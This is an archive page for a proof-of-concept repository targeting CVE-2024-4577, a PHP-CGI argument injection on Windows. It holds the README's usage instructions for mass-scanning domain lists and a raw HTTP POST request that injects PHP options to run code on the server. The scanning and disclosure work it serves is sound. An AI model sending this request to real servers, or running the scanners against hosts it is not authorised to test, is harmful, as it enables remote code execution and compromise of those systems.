Associated Vulnerability
Title:Argument Injection in PHP-CGI (CVE-2024-4577)Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Description
PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template cve-2024-4577, pentest, php, poc, rce-exploit, redteam
Readme
# PHP RCE PoC
## CVE-2024-4577: Argument Injection in PHP-CGI
## Overview
This repository contains scripts to check for the CVE-2024-4577 vulnerability, an argument injection issue in PHP-CGI. You can use the provided Bash, Go, and Python scripts to test a list of domains for this vulnerability. I've also released a Nuclei YAML file.
## Usage
### Bash Script
To use the Bash script, run the following command:
```bash
./CVE-2024-4577.sh /path/to/domains-list
```
### Go Script
First, save the Go script to a file named `CVE-2024-4577.go`. To build and run the Go script:
1. Compile the Go script into a binary:
```bash
go build -o CVE-2024-4577 CVE-2024-4577.go
```
2. Execute the binary with the domain list file as an argument:
```bash
./CVE-2024-4577 /path/to/domains-list
```
### Python Script
First, save the Python script to a file named `CVE-2024-4577.py`. To run the Python script:
1. Ensure you have the `requests` library installed:
```bash
pip install requests
```
2. Execute the Python script with the domain list file as an argument:
```bash
python CVE-2024-4577.py /path/to/domains-list
```
3. (Optional) If you want to only print vulnerable hosts:
```bash
python CVE-2024-4577.py /path/to/domains-list --quiet
```
## Proof of Concept (POC) Explained
To manually test for the vulnerability, you can send the following POST request:
```http
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php phpinfo(); ?>
```
## Nuclei Template
I've also created a Nuclei template to scan for vulnerable instances, it uses the v3 layout scheme and has been tested in a lab environment:
```
nuclei -t CVE-2024-4577.yaml -u <target-url>
```
## Domain List Example
The list of domains should be pre-pended with http/https to ensure they are read correctly.
```
http://example.com
http://testsite.com
http://vulnerablesite.com
```
## Example Output
If a domain is found to be vulnerable, the output will be:
```
http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
```
File Snapshot
[4.0K] /data/pocs/3b72e07d704d6f65e92b8e9b07584d15236ad1ef
├── [3.5K] CVE-2024-4577.go
├── [1.7K] CVE-2024-4577.py
├── [1.1K] CVE-2024-4577.sh
├── [1.0K] CVE-2024-4577.yaml
└── [2.3K] README.md
0 directories, 5 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →